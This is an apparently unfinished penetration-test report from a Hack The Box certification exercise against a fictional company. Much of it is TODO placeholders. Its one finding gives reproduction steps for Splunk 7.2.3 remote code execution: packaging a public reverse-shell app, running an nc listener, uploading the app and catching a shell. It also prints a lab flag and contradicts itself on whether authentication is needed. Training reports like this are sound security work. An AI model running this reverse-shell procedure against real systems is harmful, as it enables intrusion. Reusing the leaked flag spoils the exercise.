HACKTHEBOX

Penetration Test
Certified Penetration Testing
Specialist

Report of Findings
HTB Certified Penetration Testing Specialist (CPTS) Exam Report

Candidate Name: Muhammad Usman

OffShore LTD.
June 17, 2024

Version: 1.0

CONFIDENTIAL
 HACKTHEBOX

Table of Contents
1 Statement of Confidentiality .................................................................... 3

2 Engagement Contacts ............................................................................... 4

3 Executive Summary .................................................................................... 5

3.1 Approach .................................................................................................................... 5
3.2 Scope .......................................................................................................................... 5
3.3 Assessment Overview and Recommendations ..................................................... 5

4 Network Penetration Test Assessment Summary .................................. 7

4.1 Summary of Findings ............................................................................................... 7

5 Internal Network Compromise Walkthrough ......................................... 8

5.1 Detailed Walkthrough .............................................................................................. 8

6 Remediation Summary .............................................................................. 9

6.1 Short Term ................................................................................................................. 9
6.2 Medium Term ............................................................................................................ 9
6.3 Long Term .................................................................................................................. 9

7 Technical Findings Details ....................................................................... 10

Splunk 7.2.3 Authenticated RCE via Custom App ........................................................ 10

A Appendix ................................................................................................... 13
A.1 Finding Severities ................................................................................................... 13
A.2 Host & Service Discovery ....................................................................................... 14
A.3 Subdomain Discovery ............................................................................................ 15
A.4 Exploited Hosts ....................................................................................................... 16
A.5 Compromised Users ............................................................................................... 17
A.6 Changes/Host Cleanup .......................................................................................... 18
A.7 Flags Discovered ..................................................................................................... 19

CONFIDENTIAL Certified Penetration Testing Specialist 2

 HACKTHEBOX

1 Statement of Confidentiality
The contents of this document have been developed by Hack The Box. Hack The Box considers the
contents of this document to be proprietary and business confidential information. This information is
to be used only in the performance of its intended use. This document may not be released to another
vendor, business partner or contractor without prior written consent from Hack The Box. Additionally,
no portion of this document may be communicated, reproduced, copied or distributed without the
prior consent of Hack The Box.

The contents of this document do not constitute legal advice. Hack The Box's offer of services that
relate to compliance, litigation or other legal interests are not intended as legal counsel and should
not be taken as such. The assessment detailed herein is against a fictional company for training and
examination purposes, and the vulnerabilities in no way affect Hack The Box external or internal
infrastructure.

CONFIDENTIAL Certified Penetration Testing Specialist 3

 HACKTHEBOX

2 Engagement Contacts
OffShore Contacts
Contact Title Contact Email
MrB3n Lab Master mrb3n@hackthebox.com

Assessor Contact
Assessor Name Title Assessor Contact Email
Muhammad Usman Pentester orbixio@proton.me

CONFIDENTIAL Certified Penetration Testing Specialist 4

 HACKTHEBOX

3 Executive Summary
OffShore LTD. (“OffShore” herein) contracted Muhammad Usman to perform a Network Penetration
Test of OffShore’s externally facing network to identify security weaknesses, determine the impact to
OffShore, document all findings in a clear and repeatable manner, and provide remediation
recommendations.

3.1 Approach
Muhammad Usman performed testing under a “Black Box” approach from June 6, 2024, to June 16,
2024 without credentials or any advance knowledge of OffShore’s externally facing environment with
the goal of identifying unknown weaknesses. Testing was performed from a non-evasive standpoint
with the goal of uncovering as many misconfigurations and vulnerabilities as possible. Testing was
performed remotely from Muhammad Usman's assessment labs. Each weakness identified was
documented and manually investigated to determine exploitation possibilities and escalation
potential. Muhammad Usman sought to demonstrate the full impact of every vulnerability, up to and
including internal domain compromise. If Muhammad Usman were able to gain a foothold in the
internal network, OffShore as a result of external network testing, OffShore allowed for further testing
including lateral movement and horizontal/vertical privilege escalation to demonstrate the impact of
an internal network compromise.

3.2 Scope
The scope of this assessment was one external IP address, two internal network ranges, the TODO
INSERT DOMAIN NAME Active Directory domain, and any other Active Directory domains owned by
OffShore discovered if internal network access were achieved.

In Scope Assets
Host/URL/IP Address Description
10.10.110.0/24 External Network Range

3.3 Assessment Overview and Recommendations

During the penetration test against OffShore, Muhammad Usman identified 1 findings that threaten
the confidentiality, integrity, and availability of OffShore’s information systems. The findings were
categorized by severity level, with TODO SEVERITY RATINGS HERE 1 of the findings being assigned a
critical-risk rating, high-risk, 0 medium-risk, and 0 low risk. There were also 0 informational finding
related to enhancing security monitoring capabilities within the internal network.

TODO EXECUTIVE SUMMARY HERE

OffShore should create a remediation plan based on the Remediation Summary section of this report,
addressing all high findings as soon as possible according to the needs of the business. OffShore
should also consider performing periodic vulnerability assessments if they are not already being
performed. Once the issues identified in this report have been addressed, a more collaborative, in-

CONFIDENTIAL Certified Penetration Testing Specialist 5

 HACKTHEBOX

depth Active Directory security assessment may help identify additional opportunities to harden the
Active Directory environment, making it more difficult for attackers to move around the network and
increasing the likelihood that OffShore will be able to detect and respond to suspicious activity.

CONFIDENTIAL Certified Penetration Testing Specialist 6

 HACKTHEBOX

4 Network Penetration Test Assessment

Summary
Muhammad Usman began all testing activities from the perspective of an unauthenticated user on the
internet. OffShore provided the tester with network ranges but did not provide additional information
such as operating system or configuration information.

4.1 Summary of Findings

During the course of testing, Muhammad Usman uncovered a total of 1 findings that pose a material
risk to OffShore’s information systems. Muhammad Usman also identified 0 informational finding that,
if addressed, could further strengthen OffShore’s overall security posture. Informational findings are
observations for areas of improvement by the organization and do not represent security
vulnerabilities on their own. The below chart provides a summary of the findings by severity level.

In the course of this penetration test 1 Critical vulnerabilities were identified:

Figure 1 - Distribution of identified vulnerabilities

Below is a high-level overview of each finding identified during testing. These findings are covered in
depth in the Technical Findings Details section of this report.

# Severity Level Finding Name Page

1 9.5 (Critical) Splunk 7.2.3 Authenticated RCE via Custom App 10

CONFIDENTIAL Certified Penetration Testing Specialist 7

 HACKTHEBOX

5 Internal Network Compromise Walkthrough

During the course of the assessment Muhammad Usman was able gain a foothold via the external
network, move laterally, and compromise the internal network, leading to full administrative control
over the TODO INSERT DOMAIN NAME Active Directory domain. The steps below demonstrate the
steps taken from initial access to compromise and does not include all vulnerabilities and
misconfigurations discovered during the course of testing. Any issues not used as part of the path to
compromise are listed as separate, standalone issues in the Technical Findings Details section, ranked
by severity level. The intent of this attack chain is to demonstrate to OffShore the impact of each
vulnerability shown in this report and how they fit together to demonstrate the overall risk to the client
environment and help to prioritize remediation efforts (i.e., patching two flaws quickly could break up
the attack chain while the company works to remediate all issues reported). While other findings
shown in this report could be leveraged to gain a similar level of access, this attack chain shows the
initial path of least resistance taken by the tester to achieve domain compromise.

5.1 Detailed Walkthrough

Muhammad Usmanperformed the following to fully compromise the TODO INSERT DOMAIN NAME
domain.

1. TODO LIST HIGH LEVEL STEPS

2. ...

Detailed reproduction steps for this attack chain are as follows: TODO FILL IN DETAILED ATTACK
CHAIN STEPS

Muhammad Usmanthen performed the following to fully compromise the TODO INSERT OTHER
INTERNAL DOMAIN NAME(S) domain.

1. TODO LIST HIGH LEVEL STEPS

2. ...

Detailed reproduction steps for this attack chain are as follows: TODO FILL IN DETAILED ATTACK
CHAIN STEPS

CONFIDENTIAL Certified Penetration Testing Specialist 8

 HACKTHEBOX

6 Remediation Summary
As a result of this assessment there are several opportunities for OffShore to strengthen its internal
network security. Remediation efforts are prioritized below starting with those that will likely take the
least amount of time and effort to complete. OffShore should ensure that all remediation steps and
mitigating controls are carefully planned and tested to prevent any service disruptions or loss of data.

6.1 Short Term

TODO SHORT TERM REMEDIATION:

• Finding Reference 1 - Set strong (24+ character) passwords on all SPN accounts
• Finding Reference 2 - TODO FILL IN AS APPROPRIATE
• Finding Reference 3 - Enforce a password change for all users because of the domain compromise

TODO FILL IN BASED ON FINDINGS, EXAMPLES LEFT FOR REFERENCE

6.2 Medium Term

TODO MEDIUM TERM REMEDIATION:

• Finding Reference 1 - Disable LLMNR and NBT-NS wherever possible

• Finding Reference 2 - TODO FILL IN AS APPROPRIATE

TODO FILL IN BASED ON FINDINGS, EXAMPLES LEFT FOR REFERENCE

6.3 Long Term

TODO LONG TERM REMEDIATION:

• Perform ongoing internal network vulnerability assessments and domain password audits
• Perform periodic Active Directory security assessments
• Educate systems and network administrators and developers on security hardening best practices
compromise
• Enhance network segmentation to isolate critical hosts and limit the effects of an internal
compromise
• TODO FILL IN AS APPROPRIATE

TODO FILL IN BASED ON FINDINGS, EXAMPLES LEFT FOR REFERENCE

CONFIDENTIAL Certified Penetration Testing Specialist 9

 HACKTHEBOX

7 Technical Findings Details

1. Splunk 7.2.3 Authenticated RCE via Custom App - Critical
CWE CWE-20
9.5 / CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N/E:H/RL:O/RC:C/CR:M/IR:H/
CVSS 3.1
AR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H
A remote code execution (RCE) vulnerability has been identified in Splunk
Enterprise version 7.2.3. This issue allows attackers to execute arbitrary code on
Root Cause the server via a custom app without requiring authentication. The vulnerability
arises from insufficient validation of user inputs in the app creation process,
enabling attackers to gain control over the Splunk environment.
The RCE vulnerability in Splunk Enterprise 7.2.3 allows attackers to execute
arbitrary code without authentication, leading to unauthorized access, data
Impact
exfiltration, full system compromise, operational disruption, and reputational
damage. Immediate remediation is essential to mitigate these risks.
Affected
NIX01 Server
Component
• Upgrade: Update to the latest version of Splunk Enterprise where the
vulnerability is patched.
• Input Validation: Implement strict input validation and sanitization for custom
app inputs.
• Restrict Access: Limit access to the custom app creation feature to trusted
Remediation
users only.
• Monitoring: Regularly monitor for suspicious activities and potential
exploitation attempts.
• Apply Patches: Ensure all security patches and updates from Splunk are
applied promptly.
• https://www.rapid7.com/db/modules/exploit/multi/http/
References splunk_upload_app_exec/
• https://github.com/0xjpuff/reverse_shell_splunk

Finding Evidence
Clone the reverse_shell_splunk repository from GitHub.

$ git clone https://github.com/0xjpuff/reverse_shell_splunk

$ cd reverse_shell_splunk/reverse_shell_splunk
$ tree .
├── bin
└── default

2 directories, 0 files

Modify the bin/run.py and bin/run.ps1 files to set the attacker's IP address and port:

CONFIDENTIAL Certified Penetration Testing Specialist 10

 HACKTHEBOX

Compress the reverse_shell_splunk directory into a .tar.gz file:

$ tar -cvzf updater.tar.gz reverse_shell_splunk

reverse_shell_splunk/
reverse_shell_splunk/bin/
reverse_shell_splunk/bin/rev.py
reverse_shell_splunk/bin/run.ps1
reverse_shell_splunk/bin/run.bat
reverse_shell_splunk/default/
reverse_shell_splunk/default/inputs.conf

Open a terminal and start a Netcat listener on the specified port.:

$ nc -lnvp 4444

Upload the prepared payload file updater.tar.gz via the Splunk web interface:

CONFIDENTIAL Certified Penetration Testing Specialist 11

 HACKTHEBOX

Upon successful upload, a shell session will be received at the Netcat listener.

$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.110.123] 50648
mark@NIX01:/$

CONFIDENTIAL Certified Penetration Testing Specialist 12

 HACKTHEBOX

A Appendix
A.1 Finding Severities
Each finding has been assigned a severity rating of critical, high, medium, low or info. The rating is
based off of an assessment of the priority with which each finding should be viewed and the potential
impact each has on the confidentiality, integrity, and availability of OffShore’s data.

Rating CVSS Score Range

Critical 9.0 – 10.0
High 7.0 – 8.9
Medium 4.0 – 6.9
Low 0.1 – 3.9
Info 0.0

CONFIDENTIAL Certified Penetration Testing Specialist 13

 HACKTHEBOX

A.2 Host & Service Discovery

IP Address Port Service Notes
TODO FILL IN AS APPROPRIATE

CONFIDENTIAL Certified Penetration Testing Specialist 14

 HACKTHEBOX

A.3 Subdomain Discovery

URL Description Discovery Method
TODO FILL IN DISCOVERED VHOSTS/SUBDOMAINS

CONFIDENTIAL Certified Penetration Testing Specialist 15

 HACKTHEBOX

A.4 Exploited Hosts

Host Scope Method Notes
TODO FILL IN AS APPROPRIATE Text Text Text

CONFIDENTIAL Certified Penetration Testing Specialist 16

 HACKTHEBOX

A.5 Compromised Users

Username Type Method Notes
TODO FILL IN AS APPROPRIATE Text Text Text

CONFIDENTIAL Certified Penetration Testing Specialist 17

 HACKTHEBOX

A.6 Changes/Host Cleanup

Host Scope Change/Cleanup Needed
TODO FILL IN AS APPROPRIATE

CONFIDENTIAL Certified Penetration Testing Specialist 18

 HACKTHEBOX

A.7 Flags Discovered

Flag
Host Flag Value Flag Location Method Used
#
NIX0 OFFSHORE{b3h0ld_th3_P0w3r_0f_$pl /home/mark/ Splunk RCE via Custom
1.
1 unk} flag.txt App
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.

CONFIDENTIAL Certified Penetration Testing Specialist 19

 HACKTHEBOX

End of Report

This report was rendered

by SysReptor with
♥

CONFIDENTIAL Certified Penetration Testing Specialist 20